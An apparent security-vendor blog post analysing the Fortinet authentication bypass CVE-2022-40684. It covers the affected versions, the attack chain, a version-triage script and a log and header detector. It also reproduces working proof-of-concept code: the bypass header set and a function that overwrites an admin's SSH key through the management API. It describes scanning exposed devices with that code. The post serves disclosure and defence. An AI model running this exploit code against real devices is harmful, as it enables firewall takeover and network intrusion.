On October 7, 2022, less than a month after the ProxyNotShell attacks that used Microsoft Exchange Server zero-day vulnerabilities, a Fortinet authentication bypass vulnerability, CVE-2022-40684, was disclosed. It is being exploited in the wild against FortiGate, FortiProxy, and FortiSwitch Manager, and affects the 7.x firmware line of those products.
This article analyzes the Fortinet authentication bypass vulnerability (Fortinet products are used by 565,000 customers worldwide, putting the vendor alongside Palo Alto Networks) and explains how you can check for Fortinet products that are exposed on the internet.
CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Latest Updates
The authentication bypass vulnerability was disclosed to customers on October 7, 2022, and became public soon afterwards through several reports. On October 10, 2022, a list of all affected Fortinet products and versions was published.
Vulnerable Products
- FortiOS: versions 7.2.0 ~ 7.2.1 and 7.0.0 ~ 7.0.6
- FortiProxy: versions 7.2.0 and 7.0.0 ~ 7.0.6
- FortiSwitch Manager: versions 7.2.0 and 7.0.0
- FortiOS: versions 5.x and 6.x are not affected
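As an added example (not code from the article or from Fortinet), the affected ranges above turned into a small inventory check: given a product name and the version string a device reports, it says whether the device falls inside an affected range. The inventory entries and version strings are constructed samples.

```python
# Added example: map the published affected ranges for CVE-2022-40684 to a
# version check that can be run over an asset inventory. Ranges are inclusive
# (product -> list of (lowest affected, highest affected)).
import re

AFFECTED = {
    "FortiOS": [((7, 0, 0), (7, 0, 6)), ((7, 2, 0), (7, 2, 1))],
    "FortiProxy": [((7, 0, 0), (7, 0, 6)), ((7, 2, 0), (7, 2, 0))],
    "FortiSwitchManager": [((7, 0, 0), (7, 0, 0)), ((7, 2, 0), (7, 2, 0))],
}


def parse_version(text):
    """Accept forms such as 'v7.2.1', '7.0.6,build0366' or '7.2.0' and
    return an (major, minor, patch) tuple."""
    m = re.search(r"v?(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(product, version_text):
    """True when the reported version lies inside an affected range.
    Versions outside the 7.x line (5.x, 6.x) fall through to False."""
    v = parse_version(version_text)
    return any(lo <= v <= hi for lo, hi in AFFECTED[product])


def triage(inventory):
    """inventory: list of (hostname, product, version string).
    Returns the hostnames that need the patch (or the interim mitigation)."""
    return [host for host, product, ver in inventory if is_affected(product, ver)]


# Constructed sample inventory; the version strings mimic FortiOS output but
# are not taken from any real device.
SAMPLE_INVENTORY = [
    ("fw-branch-01", "FortiOS", "v7.2.1,build1254"),
    ("fw-hq-01", "FortiOS", "v7.2.2,build1255"),
    ("fw-legacy", "FortiOS", "v6.4.9,build1966"),
    ("proxy-01", "FortiProxy", "v7.0.6"),
    ("fsm-01", "FortiSwitchManager", "v7.0.0"),
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(f"[!] {host} runs an affected version")
```

The check is deliberately strict about the ranges: 7.2.2 and 7.0.7 are outside them, as are all 5.x and 6.x builds, matching the published list.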
According to the announcement, attackers can obtain information about administrative users, including each user’s public SSH key, trusted host (trusthost) settings and IP, FortiToken, device serial number, and FortiOS version, through HTTP/HTTPS requests to the administrative interface of affected versions. Beyond reading this information, they can also gain access to the product’s CLI by uploading their own RSA public key, replacing the admin user’s SSH key. Once that succeeds, they have full control of the management interface and can move into the internal network.
Order of Attack
- Modify the admin user’s SSH key to their own key so they can log in when they acquire a vulnerable server
- Add local user
- Access interface and update networking configurations
- Leak other confidential system information through packet capture and interface management pages
Fortinet asked customers to check their systems immediately. If a log entry containing user="Local_Process_Access" is found, the device should be patched and treated as potentially compromised without delay.
Detect Vulnerable Fortinet Using PoC Code
You can identify vulnerable Fortinet servers by sending an HTTP/HTTPS request to ‘api/v2/cmdb/system/admin’ and checking whether the system information is returned without authentication.
The headers below are what the PoC sends to bypass authentication.
CVE-2022-40684 PoC Code: https://github.com/carlosevieira/CVE-2022-40684
```python
headers = {
    "user-agent": "Node.js",
    "accept-encoding": "gzip, deflate",
    "Host": "127.0.0.1:9980",
    "forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
    "x-forwarded-vdom": "root",
}
```
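The two indicators the article gives, the user="Local_Process_Access" log entry and the bypass header set above, can be turned into detection logic. The following is an added example (not code from the article, from Fortinet, or from either PoC repository): it parses FortiOS key=value event-log lines, flags the Local_Process_Access marker and the configuration changes the attack chain makes (an admin SSH key replaced, an admin account added), and provides a header-level check that a reverse proxy or WAF in front of the administrative interface could apply. The log lines and request headers are constructed samples that follow the FortiOS log layout; the field names cfgpath, cfgobj and cfgattr are FortiOS configuration-change fields.

```python
# Added example: detection for CVE-2022-40684 exploitation attempts.
import re

# key=value pairs, values either double-quoted or bare (FortiOS log layout)
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_fortios_log(line):
    """Turn one FortiOS log line into a dict of field -> value."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(4))
            for m in KV_RE.finditer(line)}


def classify(fields):
    """Return the findings for one parsed record (empty list if benign)."""
    findings = []
    if fields.get("user") == "Local_Process_Access":
        findings.append("bypass-indicator: user=Local_Process_Access")
    if fields.get("cfgpath") == "system.admin":
        if "ssh-public-key" in fields.get("cfgattr", ""):
            findings.append(f"admin ssh key changed on {fields.get('cfgobj')}")
        if fields.get("action") == "Add":
            findings.append(f"admin account added: {fields.get('cfgobj')}")
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        findings = classify(parse_fortios_log(line))
        if findings:
            hits.append((n, findings))
    return hits


def suspicious_admin_request(path, headers):
    """Header-level check for the bypass shape: a request to the CMDB API whose
    Forwarded header claims a loopback origin, or which carries X-Forwarded-Vdom.
    A client outside the device has no reason to send either."""
    h = {k.lower(): v for k, v in headers.items()}
    if not path.startswith("/api/v2/cmdb/"):
        return False
    return "127.0.0.1" in h.get("forwarded", "") or "x-forwarded-vdom" in h


# Constructed sample log: one normal admin login, then two entries of the kind
# an exploitation attempt produces (key replaced, extra admin added).
SAMPLE_LOG = [
    'date=2022-10-12 time=09:01:10 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Admin login successful" user="admin" ui="https(203.0.113.10)" '
    'action="login" status="success" msg="Administrator admin logged in successfully"',
    'date=2022-10-12 time=09:05:42 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object attribute configured" user="Local_Process_Access" '
    'ui="jsconsole" action="Edit" cfgpath="system.admin" cfgobj="admin" '
    'cfgattr="ssh-public-key1[*]" msg="Edit system.admin admin"',
    'date=2022-10-12 time=09:06:03 type="event" subtype="system" level="information" '
    'vd="root" logdesc="Object configured" user="Local_Process_Access" ui="jsconsole" '
    'action="Add" cfgpath="system.admin" cfgobj="support" msg="Add system.admin support"',
]

# Constructed sample request, mirroring the header set the PoC sends.
SAMPLE_REQUEST = ("/api/v2/cmdb/system/admin", {
    "User-Agent": "Node.js",
    "Forwarded": 'by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=',
    "X-Forwarded-Vdom": "root",
})

if __name__ == "__main__":
    for n, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {'; '.join(findings)}")
    print("request flagged:", suspicious_admin_request(*SAMPLE_REQUEST))
```

The log side is the durable signal: the device records the Local_Process_Access user regardless of how the request reached it, so retro-hunting over archived event logs is possible even where no proxy sat in front of the interface. The header check only helps where something upstream of FortiOS sees the raw request.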
If a server is vulnerable, an attacker can bypass SSH authentication by delivering their own public key to it in the same request shape.
CVE-2022-40684 PoC Code: https://github.com/horizon3ai/CVE-2022-40684
```python
import requests

# HEADERS is the authentication-bypass header set shown above; format_key()
# is defined elsewhere in the PoC and reads the public key file into one line.
def add_key(target, username, key_file):
    key = format_key(key_file)
    j = {
        "ssh-public-key1": '\"' + key + '\"'
    }
    # PUT against the admin object replaces that user's SSH public key
    url = f'https://{target}/api/v2/cmdb/system/admin/{username}'
    r = requests.put(url, headers=HEADERS, json=j, verify=False)
    if 'SSH key is good' not in r.text:
        print(f'[-] {target} is not vulnerable!')
    else:
        print(f'[+] SSH key for {username} added successfully!')
```
You can confirm whether the server is vulnerable by making an HTTP/HTTPS request to an open Fortinet IP address using the PoC code.
Fortinet Firewalls Left Unpatched: Immediate Inspection Is Needed
We checked certain Fortinet IPs exposed on the internet for the vulnerability using the released PoC.
The image below shows that the vulnerable server exposes the username, the user’s privileges (read-only, super_admin), and the SSH public key.
The exposed firmware version is 7.2.0, and the product in use is a FortiGate 100E.

As we can see below, the admin’s SSH public key is listed as a fake-key. From this, we can assume that this server has already been affected by the Fortinet authentication bypass vulnerability.

If you search for the server’s IP address on Criminal IP Asset Search, you can see that it is an IP address owned by Microsoft (as_name: MICROSOFT-CORP-MSN-AS-BLOCK).
CVE-2022-40684 Fortinet Authentication Bypass Vulnerability Security Check
The CVE-2022-40684 Fortinet authentication bypass vulnerability received a CVSS v3 score of 9.8. Despite Fortinet’s patch recommendations, many servers around the world are still operating a vulnerable firewall.
This vulnerability gives an attacker access to the firewall CLI through the authentication bypass, so it is dangerous not only for internet-facing devices but also for devices operating internally. Applying the security update is strongly recommended. If updating the OS version is difficult, restrict which IP addresses can reach the HTTP/HTTPS administrative interface, or disable it.
See also our article on detecting and analyzing servers exposed to the Microsoft Exchange zero-day vulnerability.
Source : Criminal IP (https://www.criminalip.io)